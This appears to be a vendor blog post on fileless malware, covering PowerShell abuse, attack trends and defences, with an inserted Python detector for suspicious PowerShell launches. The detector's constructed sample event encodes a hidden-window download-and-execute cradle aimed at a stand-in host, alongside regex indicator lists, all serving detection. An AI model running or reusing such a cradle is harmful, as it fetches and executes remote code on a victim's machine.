Malware, whether it be computer viruses, spyware, or ransomware, typically uses files to infiltrate a system and wreak havoc. It’s a threat many Australian businesses are aware of and go to great lengths to prevent, but cyberthreats are ever-evolving.
Today, hackers are finding massive success with a sophisticated class of threats called ‘fileless malware.’ What makes these attacks so terrifying is that they evade detection by traditional security systems to carry out a slew of malicious activities. To ensure your business’s safety, here’s everything you need to know.
What is fileless malware?
Fileless malware differs from traditional malware in that it doesn’t place malicious files and programs on a computer. Instead, it injects itself into a computer’s temporary memory (or RAM) to execute malicious processes. Victims often contract fileless malware by clicking on spam emails or ads that contain links to an infected website. These sites will then load malicious Flash or Java processes that interact with a computer’s built-in applications.
Fileless attacks usually take advantage of legitimate applications like Windows PowerShell, a system administrator tool used for automating processes and other configurations. If hackers manage to compromise these apps, they can harm your computer in various ways. For example, they can:
- Elevate their access privileges to gain access to personal records and corporate information
- Plant bits of code that enable fileless malware to remain despite removal attempts
- Transfer data directly from your computer to a hacker’s remote server
- Launch ransomware and denial-of-service attacks
Given that traditional anti-malware solutions use file-based detection, they won’t be able to protect you against fileless malware. What’s worse, since the threat runs in a computer’s temporary memory, all traces of it disappear when either its mission has been carried out or a user reboots their machine. This makes fileless malware extremely difficult to detect, analyse, and remove.
Fileless malware trends
Although traditional malware attacks continue to plague Australian organisations, more hackers are relying on fileless attacks to breach corporate systems. A study from McAfee Labs reveals that fileless attacks surged by 432% between 2016 and 2017. This trend continued in 2018 as more than 4,000 new PowerShell fileless malware were discovered every quarter.
A Kaspersky report also found that banks, telecommunication companies, and government agencies were prime targets for fileless attacks. This is largely because such organisations have massive networks that span the globe and store vast amounts of data that are extremely valuable to cybercriminals.
However, these threats will likely become more indiscriminate and potent in the coming months.
What will happen in 2019?
There’s no denying that fileless malware attacks on Australian businesses are on the rise. Since these attacks infiltrate a computer as soon as users visit an infected website, phishing emails will have even higher success rates. What’s more, ready-made fileless malware kits will likely become a staple on the black market. Combine these with the fact that many users run unpatched software, and fileless attacks will be commonplace in 2019.
Cybersecurity specialists also predict more fileless attacks will develop self-propagating or wormlike properties. These fileless worms, or ‘vaporworms,’ exploit software vulnerabilities to spread to other machines connected to the same network. Such attacks can be used for large-scale denial of service and ransomware attacks. In fact, WannaCry and Petya ransomware exhibited vaporworm elements when they managed to spread to hundreds of thousands of computers worldwide.
How to defend against fileless malware
Reducing your company’s exposure to fileless malware goes beyond anti-malware solutions. It requires a multilayered approach that begins with proactively updating your software. This especially includes Microsoft applications like PowerShell and Windows Defender that now have enhanced security measures against fileless attacks.
Advanced endpoint protection systems are another key element of your defence strategy. These tools monitor your systems for suspicious behaviour, such as high RAM usage, computers connecting to unusual servers, and data leaving the network. You should also set stringent access restrictions for company devices and disable system administrator tools if users don’t need them.
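To show what monitoring for suspicious behaviour can look like when there is no file to scan, here is an added Python example (not part of the original article or of any vendor's product) that inspects process-creation events for PowerShell launches and decodes any encoded command so its content can be checked too. The event field names, the indicator list and the sample events are assumptions constructed for the illustration.

```python
import base64
import re

# Assumed indicator set for this example; tune it to your own environment.
INDICATORS = {
    "hidden_window": r"-w(indowstyle)?\s+hidden\b",
    "download_to_memory": r"downloadstring|downloaddata|net\.webclient",
    "dynamic_execution": r"\biex\b|invoke-expression|frombase64string",
}
# Applications that open email, documents or web pages rarely need to start PowerShell.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}

def decode_encoded_command(cmdline):
    """Return the decoded script if an -EncodedCommand argument is present, else None."""
    for m in re.finditer(r"\s[-/](\w+)\s+([A-Za-z0-9+/=]+)", cmdline):
        name = m.group(1).lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
        if name == "ec" or "encodedcommand".startswith(name):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16: flag it, nothing to scan
                return ""
    return None

def analyse(event):
    """Return the sorted indicator names raised by one process-creation event."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    hits = set()
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hits.add("encoded_command")
    text = event["cmdline"] + "\n" + (decoded or "")
    hits.update(n for n, p in INDICATORS.items() if re.search(p, text, re.IGNORECASE))
    if event["parent"].lower() in DOCUMENT_PARENTS:
        hits.add("unusual_parent")
    return sorted(hits)

def encode_sample(script):
    """Build a constructed -EncodedCommand argument (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events, not taken from a real incident
    {"parent": "explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": "winword.exe", "image": PS, "cmdline": "powershell.exe -nop -w hidden -enc "
     + encode_sample("IEX (New-Object Net.WebClient).DownloadString('http://host.invalid/x')")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", analyse(ev) or "no indicators")
```

The scheduled backup script raises nothing, while the document-spawned launch raises every indicator, which is the kind of combination worth alerting on rather than any single flag.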
Finally, since fileless malware is often distributed via phishing emails and dangerous websites, comprehensive security training is a must. Employees who are aware of the latest threats and are suspicious of every email and link can dramatically reduce the chances of a fileless malware infection.
Empower IT protects Australian businesses from these threats. Our cybersecurity service comes with cutting-edge endpoint protection, access restrictions, patch management, network monitoring, security training, and more. Call us today to get a cybersecurity framework that prevents the most advanced attacks.